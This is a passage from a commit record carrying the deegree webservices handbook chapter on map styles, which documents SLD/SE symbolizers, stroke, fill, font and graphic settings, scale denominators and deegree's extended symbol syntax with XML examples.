type","message":"fix type","repos":"deegree\/deegree3,deegree\/deegree3,deegree\/deegree3,deegree\/deegree3,deegree\/deegree3","old_file":"deegree-services\/deegree-webservices-handbook\/src\/main\/asciidoc\/renderstyles.adoc","new_file":"deegree-services\/deegree-webservices-handbook\/src\/main\/asciidoc\/renderstyles.adoc","new_contents":"[[anchor-configuration-renderstyles]]\n== Map styles\n\nStyle resources are used to obtain information on how to render geo\nobjects (mostly features, but also coverages) into maps. The most common\nuse case is to reference them from a layer configuration, in order to\ndescribe how the layer is to be rendered. This chapter assumes the\nreader is familiar with basic SLD\/SE terms. The style configurations do\nnot depend on any other resource.\n\nIn contrast to other deegree configurations the style configurations do\nnot have a custom format. You can use standard SLD or SE documents\n(1.0.0 and 1.1.0 are supported), with a couple of deegree specific\nextensions, which are described below. Please refer to the\nhttp:\/\/www.opengeospatial.org\/standards\/sld[SLD] and\nhttp:\/\/www.opengeospatial.org\/standards\/se[SE] specifications for\nreference. Additionally this page contains specific examples below.\n\nIn deegree terms, each SLD or SE file will create a _style store_. In\ncase of an SE file (usually beginning at the FeatureTypeStyle or\nCoverageStyle level) the style store only contains one style, in case of\nan SLD file the style store may contain multiple styles, each identified\nby the layer (only NamedLayers make sense here) and the name of the\nstyle (only UserStyles make sense) when referenced later.\n\n.Style resources define how geo objects are rendered\nimage::workspace-overview-style.png[Style resources define how geo objects are rendered,scaledwidth=80.0%]\n\nTIP: When defining styles, take note of the log file. Upon startup the log\nwill warn you about potential problems or errors during parsing, and\nupon rendering warnings will be emitted when rendering is unsuccessful\neg. because you had a typo in a geometry property name. When you're\nseeing an empty map when expecting a fancy one, check the log before\nreporting a bug. deegree will tolerate a lot of syntactical errors in\nyour style files, but you're more likely to get a good result when your\nfiles validate and you have no warnings in the log.\n\n=== Overview\n\nFrom the point of view of the Symbology Encoding Standard, there are 5\nkinds of symbolizations, which can be present in a map image:\n\n * *Point symbolizations*\n * *Line symbolizations*\n * *Polygon symbolizations*\n * *Text symbolizations*\n * *Raster symbolizations*\n\nThe first 4 symbolizations usually represent vector feature objects.\nRaster symbolization is used to visualize raster data. This\ndocumentation chapter describes, how those symbolizations can be\nrealized using OGC symbology encoding. It will lead from the underlying\nbasics to some more complex constructions for map visulization.\n\n=== Basics\n\n==== General Layout\n\nThe general structure of an SE-Style contains:\n\n[source,xml]\n----\n<FeatureTypeStyle>\n<FeatureTypeName> \n<Rule> \n----\n\nIt is constructed like this:\n\n[source,xml]\n----\n<FeatureTypeStyle xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:sed=\"http:\/\/www.deegree.org\/se\" xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\" xmlns:plan=\"http:\/\/www.deegree.org\/plan\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <FeatureTypeName>plan:yourFeatureType<\/FeatureTypeName>\n <Rule>\n ...\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\nTIP: Before you start, always remember that every style is read top-down. So\nbe aware the second <Rule> will overpaint the first one, the third\noverpaints the second and so on\n\n==== Symbolization Rules\n\nEvery specific map visualization needs its own symbolization rule. Rules\nare defined within the *<Rule>* element. Each rule can consist of at\nleast one symbolizer. Every rule has its own name and description\nelements. The description elements are used to create the legend caption\nfrom it.\n\nDepending on the type of symbolization to create, one of the following\nsymbolizers can be used:\n\n* <PointSymbolizer>\n* <LineSymbolizer>\n* <PolygonSymbolizer>\n* <TextSymbolizer>\n* <RasterSymbolizer>\n\nSymbolizers can have an uom-attribute (units of measure), which\ndetermines the unit of all values set inside the Symbolizer. The\nfollowing values for UoM are supported within deegree:\n\n* uom=\"pixel\"\n* uom=\"meter\"\n* uom=\"mm\"\n\nThe default value is \"pixel\".\n\nWithin every symbolizer (except rastersymbolizers), a geometry property\nused for the rendering, can be specified with the *<Geometry>* element.\nIf there is no geometry specified the first geometry property of the\nFeatureType will be used.\n\nEach of the (Vector-)Symbolizer-elements has its dimensions, which are\ndescribed in more detail below:\n\n\n* *<LineSymbolizer>* has only one dimension: the <Stroke>-element (to\nstyle the stroke).\n* *<PolygonSymbolizer>* has two dimensions: the <Stroke> (to sytle the\nstroke of the polygon) and the <Fill>-element (to style the inside of\nthe polygon).\n* *<PointSymbolizer>* can also contain both dimensions: the <Stroke> (to\nstyle the stroke of the point) and the <Fill>-element (to style the\ninside of the point).\n* *<TextSymbolizer>* has three dimensions: the <Label> (to set the\nproperty, which is to be styled), the <Font> (to style the font) and the\n<Fill>-element (to style the inside of the font).\n\n\n===== Stroke\n\nTo describe a <Stroke>, a number of different <SvgParameter> can be\nused.\n\n* `name=\"stroke\"` => The stroke (color) is defined by the hex color code\n(e.g. black ==> #000000).\n* `name=\"opacity\"` => Opacity can be set by a percentage number, written\nas decimal (e.g. 0,25 => 25% opacity).\n* `name=\"with\"` => Wide or thin, set your stroke-width however you want.\n* `name=\"linecap\"` => For linecap (ending) a stroke you can choose the\nfollowing types: round, edged, square, butt.\n* `name=\"linejoin\"` => Also there are different types of linejoin\npossibilities: round, mitre, bevel.\n* `name=\"dasharray\"` => The dasharray defines where the stroke is painted\nand where not (e.g. \"1 1\" => - - - ).\n\n\n[source,xml]\n----\n<LineSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>layer:position<\/ogc:PropertyName>\n <\/Geometry>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">0.5<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-linejoin\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-dasharray\">1 1<\/SvgParameter>\n <\/Stroke>\n<\/LineSymbolizer>\n----\n\n===== Fill\n\nFor the visualization of polygons, points and texts, the <Fill> element\ncan be used additional to styling the <Stroke>. You can set the\nfollowing <SvgParameter>:\n\n* name=\"fill\" (color)\n* name=\"fill-opacity\"\n\nThese two <SvgParameter> are working like those from <Stroke>.\n\n[source,xml]\n----\n<PolygonSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.5<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <...>\n <\/Stroke>\n<\/PolygonSymbolizer>\n----\n\n===== Font\n\nFor the creation of a <TextSymbolizer>, certain parameters for the\ndisplayed text have to be set. Every <TextSymbolizer> needs a <Label> to\nbe specified. The <Font> to be used for the text symbolization can be\nset with <SvgParameter> elements. These are the possible <SvgParameter>:\n\n* `name=\"font-family\"` => Possible types are: e.g. Arial, Times Roman,\nSans-Serif\n* `name=\"font-weight\"` => Possible types are: normal, bold, bolder,\nlighter\n* `name=\"font-size\"` => Possible values are integer values\n\n\nWith a <Fill>-element a color and opacity of the font can be defined.\nThis method is used to show text which is stored in your database.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Label>\n <ogc:PropertyName>layer:displayedProperty<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">3<\/SvgParameter>\n <\/Font>\n <Fill>\n <...>\n <\/Fill>\n<\/TextSymbolizer>\n----\n\n==== Advanced symbolization\n\nThere are numerous possibilities for advanced symbolization. This\nchapter describes the basic components of advanced map stylings using\nsymbology encoding.\n\n===== Using Graphics\n\nThere are different ways to use graphical symbols as a base for map\nsymbolizations. <Mark> elements can be used to specify well known\ngraphics, <ExternalGraphic> elements can be used to have external\ngraphic files as a base for a symbolization rule.\n\n*Mark*\n\nWith Marks it is possible to use wellkown objects for symboliation as\nwell as user-generated content like SVGs. It is possible to use all of\nthese for <PointSymbolizer>, <LineSymbolizer> and <PolygonSymbolizer>.\n\nFor a <PointSymbolizer> the use of a Mark looks like the following:\n\n[source,xml]\n----\n<PointSymbolizer uom=\"meter\">\n <Geometry>\n ...\n <\/Geometry>\n <Graphic>\n <Mark>\n ...\n----\n\nFor <LineSymbolizer> and <PolygonSymbolizer> it works like this:\n\n[source,xml]\n----\n<Geometry>\n ...\n<\/Geometry>\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n ...\n----\n\nThe following wellknown objects can be used within Marks:::\n * circle\n * triangle\n * star\n * square\n * x ==> creates a cross\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n ...\n <\/Fill>\n<\/Mark>\n----\n\nIncluding an SVG graphic within a mark might look like this:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" xlink:type=\"simple\"\n xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n ...\n <\/Fill>\n <Stroke>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\n*ExternalGraphic*\n\n<ExternalGraphic>-elements can be used to embed graphics, taken from a\ngraphic-file (e.g. SVGs or PNGs). The <OnlineResource> sub-element gives\nthe URL of the graphic-file.\n\nTIP: Make sure you don't forget the MIME-type in the <Format>-sub-element\n(e.g. \"image\/svg\" or \"image\/png\").\n\n[source,xml]\n----\n<Graphic>\n <ExternalGraphic>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\"\n xlink:type=\"simple\" xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>image\/svg<\/Format>\n <\/ExternalGraphic>\n <Size>10<\/Size>\n ...\n<\/Graphic>\n----\n\n===== Size\n\nOf course everything has its own <Size>. The size is defined directly\nafter <Mark> or <ExternalGraphic>.\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n<\/Mark>\n<Size>3<\/Size>\n----\n\n===== Gap\n\nIt is possible to define Gaps for graphics within <LineSymbolizer> or\n<PolygonSymbolizer>. For this the <Gap>-element can be used like this:\n\n[source,xml]\n----\n<GraphicStroke>\n <Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <\/Graphic>\n <Gap>20<\/Gap>\n<\/GraphicStroke>l\n----\n\n===== Rotation\n\nSymbology Encoding enables the possibility to rotate every graphic\naround its center with the <Rotation>-element. This goes from zero to\n360 degrees. The rotation is clockwise unless it's negative, then it's\ncounter-clockwise.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n <Size>3<\/Size>\n <Rotation>180<\/Rotation>\n<\/Graphic>\n----\n\n===== Displacement\n\nThe <Displacement>-element allows to paint a graphic displaced from his\ngiven position. Negative and positive values are possible. THe\ndisplacement must be set via the X and Y displacement elements.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <Displacement>\n <DisplacementX>5<\/DisplacementX>\n <DisplacementY>5<\/DisplacementY>\n <\/Displacement>\n<\/Graphic>\n----\n\n===== Halo\n\nA nice possibility to highlight your font, is the <Halo>-element. The\n<Radius>-sub-element defines the size of the border.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>xplan:position<\/ogc:PropertyName>\n <\/Geometry>\n <Label>\n ...\n <\/Label>\n <Font>\n ...\n <\/Font>\n <LabelPlacement>\n ...\n <\/LabelPlacement>\n <Halo>\n <Radius>1.0<\/Radius>\n <Fill>\n ...\n <\/Fill>\n <\/Halo>\n ...\n<\/TextSymbolizer>\n----\n\n=== Using Filters\n\nWithin symbolization rules, it is possible to use Filter Encoding\nexpressions. How construct those expressions is explained within the\n<<anchor-configuration-filter>> chapter\n\n=== Basic Examples\n\n==== Point Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Weatherstations<\/Name>\n <Rule>\n <Name>Weatherstations<\/Name>\n <Description>\n <Title>Weatherstations in Utah<\/Title>\n <\/Description>\n <ogc:Filter>\n <ogc:PropertyIsEqualTo>\n <ogc:PropertyName>SomeProperty<\/ogc:PropertyName>\n <ogc:Literal>100<\/ogc:Literal>\n <\/ogc:PropertyIsEqualTo>\n <\/ogc:Filter>\n <PointSymbolizer>\n <Graphic>\n <Mark>\n <WellKnownName>square<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>13<\/Size>\n <\/Graphic>\n <\/PointSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Line Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Railroads<\/Name>\n <Rule>\n <Name>Railroads<\/Name>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#ffffff<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1.5<\/SvgParameter>\n <\/Stroke>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>-1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Polygon Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>LandslideAreas<\/Name>\n <Rule>\n <Name>LandslideAreas<\/Name>\n <Description>\n <Title>LandslideAreas<\/Title>\n <\/Description>\n <PolygonSymbolizer>\n <Fill>\n <SvgParameter name=\"fill\">#cc3300<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.3<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/PolygonSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n==== Text Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Municipalities<\/Name>\n <Rule>\n <Name>Municipalities<\/Name>\n <Description>\n <Title>Municipalities<\/Title>\n <\/Description>\n <MaxScaleDenominator>200000<\/MaxScaleDenominator>\n <TextSymbolizer>\n <Label>\n <ogc:PropertyName>app:NAME<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">12<\/SvgParameter>\n <\/Font>\n <Halo>\n <Radius>1<\/Radius>\n <Fill>\n <SvgParameter name=\"fill-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"fill\">#fefdC3<\/SvgParameter>\n <\/Fill>\n <\/Halo>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/TextSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n=== SLD\/SE clarifications\n\nThis chapter is meant to clarify deegree's behaviour when using standard\nSLD\/SE constructs.\n\n==== Perpendicular offset\/polygon orientation\n\nFor polygon rendering, the orientation is always fixed, and will be\ncorrected if a feature store yields inconsistent geometries. The outer\nring is always oriented counter clockwise, inner rings are oriented\nclockwise.\n\nA positive perpendicular offset setting results in an offset movement in\nthe outer direction, a negative setting moves the offset into the\ninterior. For inner rings the effect is flipped (a positive setting\nmoves into the interior of the inner ring, a negative setting moves into\nthe exterior of the inner ring).\n\n==== ScaleDenominators\n\nThe use of MinScaleDenominators and MaxScaleDenominators within SLD\/SE\nfiles can easily be misunderstood because of the meaning of a high or a\nlow scale. Therefore, this is clarified here according to the standard.\nIn general the MinScaleDenominator is always a smaller number than the\nMaxScaleDenominator. The following example explains, how it works:\n\n[source,xml]\n----\n<MinScaleDenominator>25000<\/MinScaleDenominator>\n<MaxScaleDenominator>50000<\/MaxScaleDenominator>\n----\n\nThis means, that the Symbolizer is being used for scales between 1:25000\nand 1:50000.\n\n=== deegree specific extensions\n\ndeegree supports some extensions of SLD\/SE and filter encoding to enable\nmore sophisticated styling. The following sections describe the\nrespective extensions for SLD\/SE and filter encoding. For several\nspecific extensions, there is a deegree SE XML\nhttp:\/\/schemas.deegree.org\/se[Schema].\n\n==== SLD\/SE extensions\n\n===== Use of alternative Symbols within the WellKnownName\n\nThe SLD\/SE specification defines a list of standard symbols, which are `circle`,\n`triangle`, `star`, `square` and `x`.\nIn addition to these standard symbols, other predefined and freely configurable\nsymbols are also available. These are described in the following chapters.\n\nFor reference each symbol is shown with the following style.\n[source,xml]\n----\n<Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.4<\/SvgParameter>\n<\/Fill>\n<Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n<\/Stroke>\n----\n\n====== Predefined symbols\n\n[cols=\"3\"]\n.Standard Symbold defined by SLD\/SE specification\n|===\na| image:se_wkn\/circle.png[] `circle`\na| image:se_wkn\/triangle.png[] `triangle`\na| image:se_wkn\/star.png[] `star`\na| image:se_wkn\/square.png[] `square`\na| image:se_wkn\/x.png[] `x`\n|\n|===\n\n[cols=\"3\"]\n.Extended Symbols `shape:\/\/`\n|===\na| image:se_wkn\/shape_backslash.png[] `shape:\/\/backslash`\na| image:se_wkn\/shape_carrow.png[] `shape:\/\/carrow`\na| image:se_wkn\/shape_ccarrow.png[] `shape:\/\/ccarrow`\n\na| image:se_wkn\/shape_coarrow.png[] `shape:\/\/coarrow`\na| image:se_wkn\/shape_dot.png[] `shape:\/\/dot`\na| image:se_wkn\/shape_horline.png[] `shape:\/\/horline`\n\na| image:se_wkn\/shape_oarrow.png[] `shape:\/\/oarrow`\na| image:se_wkn\/shape_plus.png[] `shape:\/\/plus`\na| image:se_wkn\/shape_slash.png[] `shape:\/\/slash`\n\na| image:se_wkn\/shape_times.png[] `shape:\/\/times`\na| image:se_wkn\/shape_vertline.png[] `shape:\/\/vertline`\n|\n|===\n\n[cols=\"30,30,40\"]\n.Extended Symbols `extshape:\/\/`\n|===\na| image:se_wkn\/extshape_arrow.png[] `extshape:\/\/arrow`\na| image:se_wkn\/extshape_emicircle.png[] `extshape:\/\/emicircle`\na| image:se_wkn\/extshape_narrow.png[] `extshape:\/\/narrow`\n\na| image:se_wkn\/extshape_sarrow.png[] `extshape:\/\/sarrow`\na| image:se_wkn\/extshape_triangle.png[] `extshape:\/\/triangle`\na| image:se_wkn\/extshape_triangleemicircle.png[] `extshape:\/\/triangleemicircle`\n|===\n\n[cols=\"3\"]\n.Extended Symbols `qgis:\/\/`\n|===\na| image:se_wkn\/qgis_arrow.png[] `qgis:\/\/arrow`\na| image:se_wkn\/qgis_arrowhead.png[] `qgis:\/\/arrowhead`\na| image:se_wkn\/qgis_circle.png[] `qgis:\/\/circle`\n\na| image:se_wkn\/qgis_cross.png[] `qgis:\/\/cross`\na| image:se_wkn\/qgis_cross2.png[] `qgis:\/\/cross2`\na| image:se_wkn\/qgis_crossfill.png[] `qgis:\/\/crossfill`\n\na| image:se_wkn\/qgis_diagonalhalfsquare.png[] `qgis:\/\/diagonalhalfsquare`\na| image:se_wkn\/qgis_diamond.png[] `qgis:\/\/diamond`\na| image:se_wkn\/qgis_equilateral_triangle.png[] `qgis:\/\/equilateral_triangle`\n\na| image:se_wkn\/qgis_filled_arrowhead.png[] `qgis:\/\/filled_arrowhead`\na| image:se_wkn\/qgis_halfsquare.png[] `qgis:\/\/halfsquare`\na| image:se_wkn\/qgis_hexagon.png[] `qgis:\/\/hexagon`\n\na| image:se_wkn\/qgis_lefthalftriangle.png[] `qgis:\/\/lefthalftriangle`\na| image:se_wkn\/qgis_line.png[] `qgis:\/\/line`\na| image:se_wkn\/qgis_pentagon.png[] `qgis:\/\/pentagon`\n\na| image:se_wkn\/qgis_quartercircle.png[] `qgis:\/\/quartercircle`\na| image:se_wkn\/qgis_quartersquare.png[] `qgis:\/\/quartersquare`\na| image:se_wkn\/qgis_rectangle.png[] `qgis:\/\/rectangle`\n\na| image:se_wkn\/qgis_regular_star.png[] `qgis:\/\/regular_star`\na| image:se_wkn\/qgis_righthalftriangle.png[] `qgis:\/\/righthalftriangle`\na| image:se_wkn\/qgis_semicircle.png[] `qgis:\/\/semicircle`\n\na| image:se_wkn\/qgis_star.png[] `qgis:\/\/star`\na| image:se_wkn\/qgis_thirdcircle.png[] `qgis:\/\/thirdcircle`\na| image:se_wkn\/qgis_triangle.png[] `qgis:\/\/triangle`\n|===\n\n====== Custom arrow with extshape:\/\/arrow\n\nThe symbol `extshape:\/\/arrow` can be adapted to your own needs with three optional parameters which are:\n\n * `t`: thickness of the arrow base, in a value range between 0 and 1 with a standard of 0.2\n * `hr`: height over width ratio, in a value range between 0 and 1000 with a standard of 2\n * `ab`: arrow head base ration, in a value range between 0 and 1 with a standard of 0.5\n\n.Example of `extshape:\/\/arrow` which varies `ab` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_ab_01_10.png[]\n.Example of `extshape:\/\/arrow` which varies `hr` between `0.2` and `2.0`\nimage::se_wkn_example\/extshape_arrow_hr_02_20.png[]\n.Example of `extshape:\/\/arrow` which varies `t` between `0.1` and `1.0`\nimage::se_wkn_example\/extshape_arrow_t_00_10.png[]\n\n.Example\n[source,xml]\n----\n<WellKnownName>extshape:\/\/arrow?t=0.2&hr=2&ab=0.5<\/WellKnownName>\n----\n\n====== Custom Symbol from SVG path svgpath:\/\/\n\nIt is also possible to define a symbol from a SVG path data.\nThe syntax of SVG path data is described at https:\/\/www.w3.org\/TR\/SVG\/paths.html#PathData\n\n.Example of custom symbol with \\`svgpath:\/\/`\n[cols=\"10,90\"]\n|===\na|image::se_wkn_example\/svgpath_example.png[]\na|`svgpath:\/\/m 8,14 0,-6 h -4.5 c 0,0 0,-7.5 6.6,-7.5 6,0 6.5,7.5 6.6,7.5 l -4.5,0 0,6 z m -4,0 v -2 h 2 v 2 z`\n|===\n\n====== Use Symbol from character code ttf:\/\/\n\nAlso TrueType font files can be used as source for symbols.\nFor TrueType fonts installed at System or Java level the syntax is `ttf:\/\/Font Name#code`.\nIf the font is not installed but available it can be sepcified\nabsolute or relative as `ttf:\/\/font.ttf#code`.\n\nThe character code has to be specified in hexadecimal notation prefixed with `0x`, `U+` or `\\u`.\n\n.Example of `ttf:\/\/` symbols\n[cols=\"10,30,10,50\"]\n|===\na| image::se_wkn_example\/ttf_lucida_sans.png[]\na| `ttf:\/\/Lucida Sans#0x21BB` +\n`ttf:\/\/Lucida Sans#U+21BB` +\n`ttf:\/\/Lucida Sans#\\u21bb`\na| image::se_wkn_example\/ttf_fontawesome_external.png[]\na| `ttf:\/\/..\/fontawesome-webfont.ttf#0xf13d`\n|===\n\nTIP: The character code for fonts installed at System level can be looked up\nvia the system Character Map application.\n\n====== Spacing around the symbol\n\nFor each symbol except the symbols `circle`,\n`triangle`, `star`, `square` and `x` can be defined with an explicit bound.\nThis is particularly useful if you want to display an area fill with a symbol.\n\nThis explicit limit can be specified either as width and height or as the\nlower left and upper right corner.\n\nThe syntax is: `wellknownname[width,height]` or `wellknownname[mix,miny,maxx,maxy]`\n\n[cols=\"10,40,10,40\"]\n|===\na| image:se_wkn_example\/qgis_circle_hatch_default.png[]\na| Regular symbol `qgis:\/\/circle`\na| image:se_wkn_example\/qgis_circle_hatch_bounded.png[]\na| Symbol with explicit bounds `qgis:\/\/circle[-1,-1,3,2]`\n|===\n\nTIP: The width and height must be entered in the coordinate system of the symbol.\nMost symbols are defined around the zero point with a width of 1.0.\nAccordingly it is recommended to start with the values `[1,1]` or `[-0.5,-0.5,0.5,0.5]`.\n\n===== Simplified hatches\n\nTo make hatching configuration easier, a new function `HatchingDistance` has been added,\nwhich allows the user to define the size by specifying hatching angle and desired line spacing.\n\nThe first parameter is the hatching angle, the second is the line spacing in the unit of the symboliser.\n\n.Example hatches\n[cols=\"10a,15,25,10a,15,25\",options=\"header\"]\n|===\n| | Rotation | WellKnownName | | Rotation | WellKnownName\n| image:se_wkn_example\/hatch_slash.png[] | 0 | `shape:\/\/slash`\n| image:se_wkn_example\/hatch_backslash.png[] | 0 | `shape:\/\/backslash`\n| image:se_wkn_example\/hatch_times.png[] | 0 | `shape:\/\/times`\n| image:se_wkn_example\/hatch_10deg.png[] | 10 | `shape:\/\/vertline`\n|===\n.Symbolizer used in previous example\n[source,xml]\n----\n<!-- PolygonSymbolizer for outline omitted -->\n<PolygonSymbolizer uom=\"http:\/\/www.opengeospatial.org\/se\/units\/pixel\" xmlns=\"http:\/\/www.opengis.net\/se\">\n <Fill>\n <GraphicFill>\n <Graphic>\n <Mark>\n <WellKnownName>shape:\/\/slash<\/WellKnownName>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">butt<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>\n <ogc:Function name=\"HatchingDistance\">\n <ogc:Literal>45<\/ogc:Literal>\n <ogc:Literal>10<\/ogc:Literal>\n <\/ogc:Function>\n <\/Size>\n <Rotation>0<\/Rotation>\n <\/Graphic>\n <\/GraphicFill>\n <\/Fill>\n<\/PolygonSymbolizer>\n----\nTIP: For of the shelf hates, which will create nice results, use the mark symbol `shape:\/\/slash`, `shape:\/\/backslash`\nor `shape:\/\/times` for 45\u00b0, `shape:\/\/horline` for 0\u00b0 and `shape:\/\/vertline` for 90\u00b0 hatches.\nFor hatching with user-defined angles it is recommended to use `shape:\/\/vertline`.\n\nTIP: With user-defined distances or angles that are not divisible by 45, rounding inaccuracies may occur and become\nvisible in the results depending on the used styles.\n\nTIP: To get an even hatching we recommend to set the parameter `stroke-linecap` to `butt`.\nThis is especially recommended for transparent hatches\n\n===== Use 